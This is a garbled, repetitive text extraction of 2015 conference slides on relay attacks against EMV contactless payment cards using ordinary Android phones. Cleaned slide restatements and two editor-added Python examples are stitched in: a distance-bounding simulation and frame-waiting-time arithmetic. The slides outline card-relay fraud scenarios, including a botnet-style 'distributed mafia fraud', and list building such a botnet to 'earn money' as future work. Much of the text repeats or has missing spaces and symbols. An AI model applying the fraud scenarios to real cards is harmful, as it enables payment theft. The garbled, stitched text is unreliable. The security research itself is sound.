Several works studied delay upon relay channel

Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint

Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Relay Attacks in EMV Contactless Cardswith Android OTS Devices

Jose Viladagger Ricardo J RodrıguezDagger

pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed

daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity

University of Zaragoza Spain University of Leon Spain

May 28 2015

Hack in the Box 2015Amsterdam (Nederland)

  • Introduction
  • Background
    • EMV Contactless Cards
    • Relay Attacks and Mafia Frauds
      • Android and NFC A Tale of Lve
        • Evolution of NFC Support in Android
        • Practical Implementation Alternatives in Android
          • Relay Attack Implementation
            • Demo experiment
            • Threat Scenarios
            • Resistant Mechanisms
              • Related Work
              • Conclusions
Page 38: Attacks in EMV Contactless Cards with Android OTS ... - · PDF fileRelay Attacks in EMV Contactless Cards with Android OTS Devices Jose Vila´ y, Ricardo J. Rodr´ıguez z pvtolkien@gmail.com,

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1

Distributed Mafia Fraud

BOT

BOTMASTER

BOT

BOT

BOT

BOT

BOT

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36

Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2

Hiding Fraud Locations

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36

Relay Attack Implementation (IV): Resistant Mechanisms

Brief summary of resistant mechanisms

Distance-bounding protocols
  Upper-bounding the physical distance using the round-trip time of cryptographic challenge-response messages

Timing constraints
  Not enforced in current NFC-capable systems
  The protocol itself allows timing-extension commands

Physical countermeasures
  Whitelisting/blacklisting: random UID in HCE mode → unfeasible
  RFID-blocking covers
  Physical button/switch activation
  Secondary authentication methods (e.g. on-card fingerprint scanners)
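The first mechanism on the slide is the only one that attacks the relay itself rather than the attacker's hardware: make the verifier time a cryptographic challenge-response and refuse any prover whose answers arrive later than light could carry them over the allowed distance. The following Python is an added example by the editor, not from the talk; it models a Hancke-Kuhn style distance-bounding exchange with a slow phase (nonces, PRF-derived registers) and a fast phase (single-bit challenges). No radio is involved: the `Channel` class, the `Prover` and `distance_bound_check` names, the 16-byte key and the nonces are constructed, and propagation and relay delays are simulated parameters.

```python
"""Added example (editor's code, not from the talk): a Hancke-Kuhn style
distance-bounding exchange, i.e. 'upper-bound the distance from the round-trip
time of a cryptographic challenge-response'.  No radio: propagation and relay
delays are simulated parameters.  Key and nonces are constructed."""
import hashlib
import hmac
import secrets

C_M_PER_S = 299_792_458.0   # speed of light: one metre adds ~3.3 ns each way
N_ROUNDS = 32               # fast-phase rounds; a guessing prover has p = 1/2 per round

def fast_phase_registers(key: bytes, nonce_v: bytes, nonce_p: bytes, n: int = N_ROUNDS):
    """Both parties derive registers R0 and R1 (n bits each) from a PRF over both
    nonces.  In round i the prover answers challenge bit c with R_c[i]."""
    digest = hmac.new(key, nonce_v + nonce_p, hashlib.sha256).digest()
    bits = [(digest[i // 8] >> (7 - i % 8)) & 1 for i in range(2 * n)]
    return bits[:n], bits[n:]

class Prover:
    """Card side: the slow phase derives the registers, the fast phase answers bits."""
    def __init__(self, key: bytes):
        self.key = key
    def slow_phase(self, nonce_v: bytes) -> bytes:
        self.nonce_p = secrets.token_bytes(8)
        self.r0, self.r1 = fast_phase_registers(self.key, nonce_v, self.nonce_p)
        return self.nonce_p
    def fast_phase_bit(self, round_i: int, challenge: int) -> int:
        return (self.r1 if challenge else self.r0)[round_i]

class Channel:
    """Simulated link: light-speed propagation over distance_m plus any relay latency."""
    def __init__(self, distance_m: float, relay_delay_s: float = 0.0):
        self.one_way_s = distance_m / C_M_PER_S + relay_delay_s

def distance_bound_check(key: bytes, prover: Prover, channel: Channel,
                         max_distance_m: float = 0.10, tolerated_errors: int = 0) -> bool:
    """Verifier (reader) side: accept only if every round's answer is correct
    and arrives within the round-trip time that max_distance_m permits."""
    nonce_v = secrets.token_bytes(8)
    nonce_p = prover.slow_phase(nonce_v)
    r0, r1 = fast_phase_registers(key, nonce_v, nonce_p)
    rtt_limit_s = 2 * max_distance_m / C_M_PER_S
    wrong = late = 0
    for i in range(N_ROUNDS):
        challenge = secrets.randbits(1)
        response = prover.fast_phase_bit(i, challenge)
        rtt_s = 2 * channel.one_way_s           # challenge out, response back
        if response != (r1 if challenge else r0)[i]:
            wrong += 1
        if rtt_s > rtt_limit_s:
            late += 1
    return wrong <= tolerated_errors and late == 0

if __name__ == "__main__":
    key = secrets.token_bytes(16)               # constructed shared key
    print("card at 5 cm:          ", distance_bound_check(key, Prover(key), Channel(0.05)))
    print("same card, 1 ms relay: ", distance_bound_check(key, Prover(key), Channel(0.05, 1e-3)))
    print("wrong key at 5 cm:     ", distance_bound_check(key, Prover(secrets.token_bytes(16)), Channel(0.05)))
```

The arithmetic is what makes a relay hopeless against this check: a 10 cm bound allows a round trip of about 0.67 ns, while the cheapest relay channel adds milliseconds. The caveat is on the implementation side. At 106 kbit/s one ISO/IEC 14443 bit lasts about 9.4 µs, during which light travels roughly 2.8 km, so a centimetre-scale bound cannot be measured with ordinary APDU framing; it needs a dedicated low-latency fast-phase channel, which is why the slide lists distance bounding as a mechanism rather than something today's PoS terminals do.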


Related Work: On relay attacks

2005-2009: First works, built on specific hardware

2010: Nokia mobile phones with NFC capability plus a Java MIDlet app

2012-2013: Relay attacks on Android accessing Secure Elements
  A SE securely stores data associated with credit/debit cards
  Needs a non-OTS Android device

2014: Active relay attacks with custom hardware and custom Android firmware

Several works studied the delay over the relay channel
  Relay over long distances is feasible → latency isn't a hard constraint

Ask us for specific references: too many names for a single slide


Conclusions (I)

Security of NFC is based on the physical-proximity assumption

NFC threats: eavesdropping, data modification, relay attacks

Android NFC-capable devices are on the rise
  They can be abused to interact with cards in their proximity

Conclusions
  Review of the Android NFC stack
  Proof-of-concept of relay attacks using Android OTS devices
  Threat scenarios introduced
  Virtual pickpocketing attacks may appear before long


Conclusions (II): But then, what the hell can I do? Should I run away?


Conclusions (III)

Future Work
  Develop a botnet infrastructure and earn money
  Timing constraints of Android HCE mode
  Try active relay attacks within EMV contactless cards

Acknowledgments
  Spanish National Cybersecurity Institute (INCIBE)
  University of León under contract X43
  HITB staff

And thanks to all for hearing us

Visit http://vwzq.net/relaynfc for more info about the project


Android and NFC: A Tale of L♥ve (V): Some remarkable limitations and remarks

Limitation 3
  Dishonest prover and dishonest verifier communicate through a non-reliable peer-to-peer relay channel
  ISO/IEC 14443-4 defines the Frame Waiting Time as
    FWT = 256 · (16 / f_c) · 2^FWI, with 0 ≤ FWI ≤ 14 and f_c = 13.56 MHz
  so FWT ranges from about 302 µs (FWI = 0) to about 4.95 s (FWI = 14)
  → a relay is theoretically possible when the added delay is ≤ 5 s

Concluding remarks
  Any NFC-enabled device running OTS Android ≥ 4.4 can perform an NFC passive relay attack at APDU level when the specific AID of the honest prover is known and an explicit SELECT is performed
  Any communication involving an APDU-compliant NFC tag (e.g. MIFARE DESFire EV1, Inside MicroPass or Infineon SLE66CL) can also be relayed

And now, let's move to the practice
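The FWT formula above is the entire timing budget a relay has to fit inside, so it is worth working through. The Python below is an added example written by the editor, not from the talk: it evaluates the formula for every legal FWI, extracts the FWI a real card advertises in its ATS (ISO/IEC 14443-4: high nibble of TB(1), default 4 when TB(1) is absent), and applies the S(WTX) waiting-time-extension multiplier (1 to 59) that is the "timing extension command" the protocol permits. The sample ATS bytes and the 150 ms round trip are constructed.

```python
"""Added example (editor's code, not from the talk): ISO/IEC 14443-4 frame
waiting time arithmetic, the FWI a card advertises in its ATS, and the budget
after a S(WTX) waiting-time extension.  The sample ATS is constructed."""

FC_HZ = 13_560_000          # carrier frequency f_c
FWI_DEFAULT = 4             # ISO/IEC 14443-4 default FWI when TB(1) is not transmitted
WTXM_MAX = 59               # largest multiplier a card may request in S(WTX)

def fwt_seconds(fwi: int) -> float:
    """FWT = 256 * (16 / f_c) * 2**FWI for 0 <= FWI <= 14 (15 is RFU)."""
    if not 0 <= fwi <= 14:
        raise ValueError("FWI must be in 0..14")
    return 256 * (16 / FC_HZ) * 2 ** fwi

def fwi_from_ats(ats: bytes) -> int:
    """FWI from an Answer To Select.
    Layout: TL (total length incl. TL), T0 (b5 TA(1), b6 TB(1), b7 TC(1) presence
    bits; low nibble FSCI), then the announced interface bytes, then historical
    bytes.  TB(1) carries FWI in its high nibble and SFGI in its low nibble."""
    if len(ats) < 2 or ats[0] != len(ats):
        raise ValueError("malformed ATS: TL must equal the total length")
    t0 = ats[1]
    if not t0 & 0x20:                       # TB(1) absent -> default FWI applies
        return FWI_DEFAULT
    index = 2 + (1 if t0 & 0x10 else 0)     # skip TA(1) when it is present
    return ats[index] >> 4

def relay_budget_seconds(fwi: int, wtxm: int = 1) -> float:
    """Time the reader waits for a response once the card has sent S(WTX) with wtxm."""
    if not 1 <= wtxm <= WTXM_MAX:
        raise ValueError("WTXM must be in 1..59")
    return fwt_seconds(fwi) * wtxm

def relay_feasible(delay_s: float, fwi: int, wtxm: int = 1) -> bool:
    """The slide's criterion: the relay's added delay must fit in the (extended) FWT."""
    return delay_s <= relay_budget_seconds(fwi, wtxm)

if __name__ == "__main__":
    for fwi in (0, FWI_DEFAULT, 7, 14):
        print(f"FWI={fwi:2d}  FWT={fwt_seconds(fwi) * 1000:9.3f} ms")
    sample_ats = bytes.fromhex("0578807102")   # constructed: TL=5, T0=78 (TA,TB,TC present)
    fwi = fwi_from_ats(sample_ats)
    print(f"ATS advertises FWI={fwi} ({fwt_seconds(fwi) * 1000:.2f} ms); "
          f"150 ms relay feasible? {relay_feasible(0.150, fwi)}; "
          f"with maximal S(WTX)? {relay_feasible(0.150, fwi, WTXM_MAX)}")
```

Two practical readings of the numbers. The 5 s on the slide is the ISO ceiling at FWI = 14; a real card advertises its own, usually much smaller, FWI, and a relay only gets that budget (times whatever S(WTX) multiplier the reader honours). And in HCE mode the ATS the PoS sees is produced by the phone's NFC stack, not by the app, which is why the deck lists the timing constraints of Android HCE as future work rather than a settled parameter.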

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1

Distributed Mafia Fraud

BOT

BOTMASTER

BOT

BOT

BOT

BOT

BOT

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36

Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2

Hiding Fraud Locations

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36

Relay Attack Implementation (IV)Resistant Mechanisms

Brief summary of resistant mechanismsDistance-bounding protocols

Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages

Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands

Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36

Related WorkOn relay attacks

2005-2009 First works built on specific hardware

2010 Nokia mobile phones with NFC capability plus a Java MIDletapp

2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device

2014 Active relay attacks with custom hardware and customAndroid firmware

Several works studied delay upon relay channel

Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint

Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Relay Attacks in EMV Contactless Cardswith Android OTS Devices

Jose Viladagger Ricardo J RodrıguezDagger

pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed

daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity

University of Zaragoza Spain University of Leon Spain

May 28 2015

Hack in the Box 2015Amsterdam (Nederland)

  • Introduction
  • Background
    • EMV Contactless Cards
    • Relay Attacks and Mafia Frauds
      • Android and NFC A Tale of Lve
        • Evolution of NFC Support in Android
        • Practical Implementation Alternatives in Android
          • Relay Attack Implementation
            • Demo experiment
            • Threat Scenarios
            • Resistant Mechanisms
              • Related Work
              • Conclusions
Page 40: Attacks in EMV Contactless Cards with Android OTS ... - · PDF fileRelay Attacks in EMV Contactless Cards with Android OTS Devices Jose Vila´ y, Ricardo J. Rodr´ıguez z pvtolkien@gmail.com,

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1

Distributed Mafia Fraud

BOT

BOTMASTER

BOT

BOT

BOT

BOT

BOT

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36

Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2

Hiding Fraud Locations

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36

Relay Attack Implementation (IV)Resistant Mechanisms

Brief summary of resistant mechanismsDistance-bounding protocols

Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages

Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands

Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36

Related WorkOn relay attacks

2005-2009 First works built on specific hardware

2010 Nokia mobile phones with NFC capability plus a Java MIDletapp

2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device

2014 Active relay attacks with custom hardware and customAndroid firmware

Several works studied delay upon relay channel

Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint

Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Relay Attacks in EMV Contactless Cardswith Android OTS Devices

Jose Viladagger Ricardo J RodrıguezDagger

pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed

daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity

University of Zaragoza Spain University of Leon Spain

May 28 2015

Hack in the Box 2015Amsterdam (Nederland)

  • Introduction
  • Background
    • EMV Contactless Cards
    • Relay Attacks and Mafia Frauds
      • Android and NFC A Tale of Lve
        • Evolution of NFC Support in Android
        • Practical Implementation Alternatives in Android
          • Relay Attack Implementation
            • Demo experiment
            • Threat Scenarios
            • Resistant Mechanisms
              • Related Work
              • Conclusions
Page 41: Attacks in EMV Contactless Cards with Android OTS ... - · PDF fileRelay Attacks in EMV Contactless Cards with Android OTS Devices Jose Vila´ y, Ricardo J. Rodr´ıguez z pvtolkien@gmail.com,

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

